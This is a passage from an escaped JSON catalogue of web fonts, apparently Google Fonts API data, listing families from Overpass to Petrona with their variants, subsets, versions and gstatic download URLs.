\"regular\": \"http://fonts.gstatic.com/s/overlocksc/v21/1cX3aUHKGZrstGAY8nwVzHGAq8Sk1PoH.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Overpass\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6_PLrOZCLtce-og.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6fPPrOZCLtce-og.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6ovPrOZCLtce-og.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6_PPrOZCLtce-og.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6zvPrOZCLtce-og.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6IvTrOZCLtce-og.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6G_TrOZCLtce-og.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6fPTrOZCLtce-og.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/overpass/v12/qFda35WCmI96Ajtm83upeyoaX6QPnlo6VfTrOZCLtce-og.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLADe5qPl8Kuosgz.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLCDepqPl8Kuosgz.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLBdepqPl8Kuosgz.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLADepqPl8Kuosgz.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLAxepqPl8Kuosgz.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLDdfZqPl8Kuosgz.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLDkfZqPl8Kuosgz.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLCDfZqPl8Kuosgz.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/overpass/v12/qFdU35WCmI96Ajtm81GgSdXCNs-VMF0vNLCqfZqPl8Kuosgz.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Overpass Mono\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EWKokzzXur-SmIr.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EXUokzzXur-SmIr.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EXmokzzXur-SmIr.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EUKpUzzXur-SmIr.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/overpassmono/v15/_Xm5-H86tzKDdAPa-KPQZ-AC_COcRycquHlL6EUzpUzzXur-SmIr.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ovo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ovo/v17/yYLl0h7Wyfzjy4Q5_3WVxA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oxanium\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G83JfniMBXQ7d67x.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G80XfniMBXQ7d67x.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G81JfniMBXQ7d67x.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G817fniMBXQ7d67x.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G82XeXiMBXQ7d67x.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G82ueXiMBXQ7d67x.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/oxanium/v14/RrQPboN_4yJ0JmiMUW7sIGjd1IA9G83JeXiMBXQ7d67x.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oxygen\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/oxygen/v15/2sDcZG1Wl4LcnbuCJW8Db2-4C7wFZQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/oxygen/v15/2sDfZG1Wl4Lcnbu6iUcnZ0SkAg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/oxygen/v15/2sDcZG1Wl4LcnbuCNWgDb2-4C7wFZQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Oxygen Mono\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/oxygenmono/v13/h0GsssGg9FxgDgCjLeAd7ijfze-PPlUu.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"PT Mono\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ptmono/v13/9oRONYoBnWILk-9ArCg5MtPyAcg.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"PT Sans\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79P0WOxOGMMDQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0eEwMOJIDQA-g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ptsans/v17/jizfRExUiTo99u79B_mh4OmnLD0Z4zM.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ptsans/v17/jizdRExUiTo99u79D0e8fOytKB8c8zMrig.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"PT Sans Caption\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ptsanscaption/v18/0FlMVP6Hrxmt7-fsUFhlFXNIlpcqfQXwQy6yxg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ptsanscaption/v18/0FlJVP6Hrxmt7-fsUFhlFXNIlpcSwSrUSwWuz38Tgg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"PT Sans Narrow\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ptsansnarrow/v17/BngRUXNadjH0qYEzV7ab-oWlsYCByxyKeuDp.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ptsansnarrow/v17/BngSUXNadjH0qYEzV7ab-oWlsbg95DiCUfzgRd-3.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"PT Serif\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ptserif/v17/EJRVQgYoZZY2vCFuvDFRxL6ddjb-.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ptserif/v17/EJRTQgYoZZY2vCFuvAFTzrq_cyb-vco.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/ptserif/v17/EJRSQgYoZZY2vCFuvAnt65qVXSr3pNNB.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/ptserif/v17/EJRQQgYoZZY2vCFuvAFT9gaQVy7VocNB6Iw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"PT Serif Caption\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ptserifcaption/v17/ieVl2ZhbGCW-JoW6S34pSDpqYKU059WxDCs5cvI.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ptserifcaption/v17/ieVj2ZhbGCW-JoW6S34pSDpqYKU019e7CAk8YvJEeg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pacifico\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pacifico/v22/FwZY7-Qmy14u9lezJ96A4sijpFu_.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Padauk\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"myanmar\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/padauk/v16/RrQRboJg-id7OnbBa0_g3LlYbg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/padauk/v16/RrQSboJg-id7Onb512DE1JJEZ4YwGg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Padyakke Expanded One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2023-01-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/padyakkeexpandedone/v1/K2FvfY9El_tbR0JfHb6WWvrBaU6XAUvC4IAYOKRkpDjeoQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Palanquin\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/palanquin/v13/9XUhlJ90n1fBFg7ceXwUEltI7rWmZzTH.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUvnpoxJuqbi3ezg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwU2nloxJuqbi3ezg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/palanquin/v13/9XUnlJ90n1fBFg7ceXwsdlFMzLC2Zw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUgnhoxJuqbi3ezg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUrn9oxJuqbi3ezg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/palanquin/v13/9XUilJ90n1fBFg7ceXwUyn5oxJuqbi3ezg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Palanquin Dark\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/palanquindark/v12/xn75YHgl1nqmANMB-26xC7yuF_6OTEo9VtfE.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/palanquindark/v12/xn76YHgl1nqmANMB-26xC7yuF8Z6ZW41fcvN2KT4.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/palanquindark/v12/xn76YHgl1nqmANMB-26xC7yuF8ZWYm41fcvN2KT4.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/palanquindark/v12/xn76YHgl1nqmANMB-26xC7yuF8YyY241fcvN2KT4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pangolin\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pangolin/v11/cY9GfjGcW0FPpi-tWPfK5d3aiLBG.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Paprika\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/paprika/v21/8QIJdijZitv49rDfuIgOq7jkAOw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Parisienne\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/parisienne/v13/E21i_d3kivvAkxhLEVZpcy96DuKuavM.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Passero One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/passeroone/v24/JTUTjIko8DOq5FeaeEAjgE5B5Arr-s50.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Passion One\",\n      \"variants\": [\n        \"regular\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/passionone/v16/PbynFmL8HhTPqbjUzux3JHuW_Frg6YoV.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/passionone/v16/Pby6FmL8HhTPqbjUzux3JEMq037owpYcuH8y.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/passionone/v16/Pby6FmL8HhTPqbjUzux3JEMS0X7owpYcuH8y.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Passions Conflict\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/passionsconflict/v5/kmKnZrcrFhfafnWX9x0GuEC-zowow5NeYRI4CN2V.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pathway Gothic One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pathwaygothicone/v14/MwQrbgD32-KAvjkYGNUUxAtW7pEBwx-dTFxeb80flQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Patrick Hand\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/patrickhand/v19/LDI1apSQOAYtSuYWp8ZhfYeMWcjKm7sp8g.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Patrick Hand SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/patrickhandsc/v13/0nkwC9f7MfsBiWcLtY65AWDK873ViSi6JQc7Vg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pattaya\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pattaya/v12/ea8ZadcqV_zkHY-XNdCn92ZEmVs.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Patua One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/patuaone/v16/ZXuke1cDvLCKLDcimxBI5PNvNA9LuA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pavanam\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pavanam/v11/BXRrvF_aiezLh0xPDOtQ9Wf0QcE.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Paytone One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/paytoneone/v18/0nksC9P7MfYHj2oFtYm2CiTqivr9iBq_.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Peddana\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/peddana/v20/aFTU7PBhaX89UcKWhh2aBYyMcKw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Peralta\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/peralta/v17/hYkJPu0-RP_9d3kRGxAhrv956B8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Permanent Marker\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/permanentmarker/v16/Fh4uPib9Iyv2ucM6pGQMWimMp004HaqIfrT5nlk.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Petemoss\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/petemoss/v5/A2BZn5tA2xgtGWHZgxkesKb9UouQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Petit Formal Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/petitformalscript/v13/B50TF6xQr2TXJBnGOFME6u5OR83oRP5qoHnqP4gZSiE.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Petrona\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6NsARBH452Mvds.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4NsQRBH452Mvds.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk7TsQRBH452Mvds.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6NsQRBH452Mvds.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk6_sQRBH452Mvds.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk5TtgRBH452Mvds.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk5qtgRBH452Mvds.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4NtgRBH452Mvds.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/petrona/v28/mtGl4_NXL7bZo9XXq35wRLONYyOjFk4ktgRBH452Mvds.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8uwDFYpUN-dsIWs.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8mwCFYpUN-dsIWs.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8rICFYpUN-dsIWs.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8uwCFYpUN-dsIWs.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8t4CFYpUN-dsIWs.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8jIFFYpUN-dsIWs.ttf\",\n        \"700italic\": 